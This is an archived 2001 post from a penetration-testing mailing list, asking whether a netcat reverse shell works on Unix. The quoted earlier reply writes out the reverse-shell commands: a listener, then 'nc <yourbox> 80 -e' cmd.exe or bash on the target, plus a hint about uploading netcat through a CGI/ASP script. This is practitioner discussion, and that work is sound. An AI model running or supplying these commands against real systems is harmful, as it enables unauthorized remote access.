Re: Server initiated remote shell
From: Greg Ardpic (itb@rootshell.be)Date: 09/22/01
- Previous message: Vincent R. Sola: "Re: Remote shell on Win9X - Summary"
- In reply to: Bill Pennington: "Re: Server initiated remote shell"
- Next in thread: auto241065@hushmail.com: "Re: Server initiated remote shell"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Sat, 22 Sep 2001 13:51:55 +0200 (CEST) From: Greg Ardpic <itb@rootshell.be> To: <pen-test@securityfocus.com> Subject: Re: Server initiated remote shell Message-ID: <Pine.LNX.4.33.0109221349470.22917-100000@phenix.rootshell.be>
On Fri, 21 Sep 2001, Bill Pennington wrote:
> You want netcat, you can find in on packetstorm.
>
> What you will need to do first is build an CGI/ASP script to upload your
> code, assuming you can't just tftp it from the internal system.
>
> Then on your box execute:
>
> nc -l -p 80
>
> On the remote server execute
>
> nc <yourbox> 80 -e c:\winnt\system32\cmd.exe or /usr/bin/bash or
> whatever command interpeter is handy. You will then see a command prompt
> appear on your local box.
>
> Sounds like the hard part will be getting netcat on the box. Good luck!
>
Does this works on unix machines? I have compiled netcat with
-DGAPING_SECURITY_HOLE (so i could use the -e switch) but had no luck.
itb
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
- Previous message: Vincent R. Sola: "Re: Remote shell on Win9X - Summary"
- In reply to: Bill Pennington: "Re: Server initiated remote shell"
- Next in thread: auto241065@hushmail.com: "Re: Server initiated remote shell"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
